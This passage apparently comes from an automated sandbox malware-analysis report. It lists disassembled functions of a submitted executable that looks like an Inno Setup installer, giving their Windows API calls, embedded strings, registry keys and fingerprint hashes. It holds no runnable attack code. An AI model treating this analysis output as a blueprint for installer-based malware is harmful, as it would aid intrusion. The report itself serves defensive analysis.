                                                                          • API String ID: 2812809588-1577016196
                                                                          • Opcode ID: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                          • Instruction ID: 9b4ba10c22eae4ee7854298b287fdc99132420248117da062c6f054c990cd466
                                                                          • Opcode Fuzzy Hash: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                          • Instruction Fuzzy Hash: 90911371D04608ABDB11DFA5C941BDEB7B9EB48346F50407BF900F7282D6789F098B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00456E50 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?), ref: 00456E87
                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00456EA3
                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00456EB1
                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 00456EC2
                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F09
                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F25
                                                                          Strings
                                                                          • Helper process exited., xrefs: 00456ED1
                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 00456E79
                                                                          • Helper process exited, but failed to get exit code., xrefs: 00456EFB
                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00456EEF
                                                                          • Helper isn't responding; killing it., xrefs: 00456E93
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                          • API String ID: 3355656108-1243109208
                                                                          • Opcode ID: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                          • Instruction ID: e3dcae7ee27b0c74354dd39b82ec863519094067a73f9fae9ec07b4aeacd6428
                                                                          • Opcode Fuzzy Hash: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                          • Instruction Fuzzy Hash: 09217171A047019AC720EB79D44575BB6E49F08309F41CC2FF99ACB283D77CE8488B2A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00452D68 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC1C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452E8F
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452FCB
                                                                            • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                          Strings
                                                                          • , xrefs: 00452DF1
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DD7
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DA7
                                                                          • RegCreateKeyEx, xrefs: 00452E03
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2481121983-1280779767
                                                                          • Opcode ID: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                          • Instruction ID: bd46e7fedae0378ea69e291eeb16b1e61bf49070ab8af015702d395f50882908
                                                                          • Opcode Fuzzy Hash: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                          • Instruction Fuzzy Hash: D281F076A00209AFDB00DFD5D941BEEB7B9EB49305F50442BF900F7282D778AA05DB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00490B70 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00452240: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                            • Part of subcall function 00452240: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00490BED
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00490D41), ref: 00490C0E
                                                                          • CreateWindowExA.USER32(00000000,STATIC,00490D50,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00490C35
                                                                          • SetWindowLongA.USER32(?,000000FC,004903C8), ref: 00490C48
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC,00490D50), ref: 00490C78
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00490CEC
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000), ref: 00490CF8
                                                                            • Part of subcall function 00452590: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                          • 73A25CF0.USER32(?,00490D1B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC), ref: 00490D0E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                          • API String ID: 170458502-2312673372
                                                                          • Opcode ID: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                          • Instruction ID: 92ce551481e6a002572db3822da7cd140e35cf2137eba75a76cf686200e2178a
                                                                          • Opcode Fuzzy Hash: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                          • Instruction Fuzzy Hash: EE414371A44208AFDF10EBA5DC42F9E7BF8EB09704F514576F510F7291D6799E008BA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042EA7C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042EA88
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EA9C
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EAA9
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EAB6
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0042EB02
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042EB40
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                          • Instruction ID: 33f08c3eecf59c1efe6da1d62cafc2865f84f18ea85c38477b96760789069036
                                                                          • Opcode Fuzzy Hash: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                          • Instruction Fuzzy Hash: 9721D4B67017246FD300DA69DC81F3B7B98DB84714F09462AF945DB381DA78EC008A59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045EEF0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0045EEFC
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0045EF10
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0045EF1D
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0045EF2A
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0045EF76
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0045EFB4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                          • Instruction ID: 495c241bec279fa6e8d852d727b900aa08f5c3bdd79c5966852e86187c859b95
                                                                          • Opcode Fuzzy Hash: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                          • Instruction Fuzzy Hash: EE21C2B2205604BFD2049669CC81F3B7799DB84711F09452AFD44DB3C2DA78ED098A99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00457028 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00457207,?,00000000,0045726A,?,?,02113858,00000000), ref: 00457085
                                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570E2
                                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570EF
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045713B
                                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000), ref: 00457161
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000), ref: 00457168
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                          • String ID: CreateEvent$TransactNamedPipe
                                                                          • API String ID: 2182916169-3012584893
                                                                          • Opcode ID: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                          • Instruction ID: 6afc82d78c4e6d9526045151df1525e73fa02dd6a17213aad7cd5d98e3565ae3
                                                                          • Opcode Fuzzy Hash: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                          • Instruction Fuzzy Hash: BC418F70A04608AFDB15DFA5DD81FAEB7F9EB08710F1040B6F904E7392D6789E44CA68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00454D80 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00454EE5,?,?,00000031,?), ref: 00454DA8
                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00454DAE
                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00454DFB
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                          • API String ID: 1914119943-2711329623
                                                                          • Opcode ID: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                          • Instruction ID: 2bf04720efcd21e73fda0c956b895e5846be94a4420347b52386e37effde86e0
                                                                          • Opcode Fuzzy Hash: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                          • Instruction Fuzzy Hash: 1F319271A00604AFC701EFAACC52D5BB7BEFBC87097118466FD04DB652DA38DD44C628
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E274 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0042E29D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001), ref: 0042E2F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                          • Instruction ID: 4ee60a07781906a8a0ffae9c6e5e5ebe2969662c9c3675aa1be84450fad3e8b0
                                                                          • Opcode Fuzzy Hash: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                          • Instruction Fuzzy Hash: 87214630B00215EBDB00EAA7DC51B9F77A9EB04315FD04477A900E7281DB7CAE05DB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00416CF0 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RectVisible.GDI32(?,?), ref: 00416D83
                                                                          • SaveDC.GDI32(?), ref: 00416D97
                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DBA
                                                                          • RestoreDC.GDI32(?,?), ref: 00416DD5
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416E55
                                                                          • FrameRect.USER32(?,?,?), ref: 00416E88
                                                                          • DeleteObject.GDI32(?), ref: 00416E92
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EA2
                                                                          • FrameRect.USER32(?,?,?), ref: 00416ED5
                                                                          • DeleteObject.GDI32(?), ref: 00416EDF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                          • String ID:
                                                                          • API String ID: 375863564-0
                                                                          • Opcode ID: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                          • Instruction ID: 01d81588b69ff1f480347e903aed9c185fc6c29f227380d1fa6610f1b9ad60dd
                                                                          • Opcode Fuzzy Hash: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                          • Instruction Fuzzy Hash: A8513C712086449BDB50EF69C8C0B9B77E8EF48314F15566AFD48CB286C738EC81CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00422158 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 004221A3
                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C1
                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221CE
                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221DB
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E8
                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221F5
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422202
                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042220F
                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0042222D
                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422249
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                          • String ID:
                                                                          • API String ID: 3985193851-0
                                                                          • Opcode ID: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                          • Instruction ID: e98f5eede000e984507cfb68b46ad6efe0a5c83d9602cc3651cf502f29ecaa29
                                                                          • Opcode Fuzzy Hash: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                          • Instruction Fuzzy Hash: 23213370380744BAE720D725DD8BF9B7BD89B04708F0444A5BA487F2D7C6F9AE40869C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047BE00 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(10000000), ref: 0047BFA8
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0047BFBC
                                                                          • SendNotifyMessageA.USER32(00020420,00000496,00002710,00000000), ref: 0047C021
                                                                          Strings
                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047BFDD
                                                                          • Deinitializing Setup., xrefs: 0047BE1E
                                                                          • GetCustomSetupExitCode, xrefs: 0047BE5D
                                                                          • Restarting Windows., xrefs: 0047BFFC
                                                                          • DeinitializeSetup, xrefs: 0047BEB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3817813901-1884538726
                                                                          • Opcode ID: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                          • Instruction ID: 5aabc136c0a50bbda2486703200ad66b9283696e7d5460ba133d2cc504fcf864
                                                                          • Opcode Fuzzy Hash: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                          • Instruction Fuzzy Hash: 2251BF30600A019FD712DB69E899B9A77A4EB59704F60C4BBF808C73A1DB789C45CF9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00457858 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 130registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
